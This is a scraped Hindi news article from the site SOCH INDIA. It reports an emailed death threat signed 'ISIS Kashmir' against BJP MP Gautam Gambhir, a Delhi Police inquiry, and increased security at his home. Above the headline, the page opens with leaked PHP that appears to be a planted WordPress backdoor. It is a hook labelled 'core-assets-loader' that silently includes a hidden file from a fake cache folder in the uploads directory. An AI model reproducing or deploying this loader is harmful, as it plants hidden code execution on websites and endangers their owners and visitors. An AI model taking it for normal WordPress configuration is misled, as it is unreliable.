add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ISIS कश्मीर ने ई-मेल कर BJP सांसद गौतम गंभीर को दी जान से मारने की धमकी, बढ़ाई गई सुरक्षा – SOCH INDIA
Menu

देश
ISIS कश्मीर ने ई-मेल कर BJP सांसद गौतम गंभीर को दी जान से मारने की धमकी, बढ़ाई गई सुरक्षा

nobanner

ईस्ट दिल्ली निर्वाचन क्षेत्र से BJP सांसद और पूर्व क्रिकेटर गौतम गंभीर (Gautam Gambhir) को जान से मारने की धमकी दी गई है. दरअसल गंभीर ने दिल्ली पुलिस से संपर्क किया है और बताया कि उन्हें ‘ISIS कश्मीर’ से जान से मारने की धमकी मिली है. डीसीपी सेंट्रल श्वेता चौहान ने कहा कि इस बात की जानकारी मिलते ही हमने इस मामले की जांच शुरू कर दी है.

उन्होंने कहा कि फिलहाल मामले की जांच चल रही है. इसके अलावा उन्होंने बताया कि सेफ्टी के लिए गंभीर के घर के बाहर सुरक्षा बढ़ा दी गई है.

इमेल भी किया शेयर

इसके साथ ही उन्होंने जान से मारने की धमकी वाला एक ई-मेल भी शेयर किया है. इस मेल को भेजने वाले का नाम ISIS कश्मीर है. मेल मिलने के बाद उनके घर के बाहर सुरक्षा बढ़ा दी गई है. बता दें कि क्रिकेटर से राजनेता बने गंभीर अक्सर ही अपने बेबाक राय के लिए चर्चा में रहते हैं. उन्हें हर गंभीर मुद्दों पर अपनी राय रखते पाया गया है. उन्होंने पहले भी कई बार आतंकवाद के खिलाफ बयान दिया है.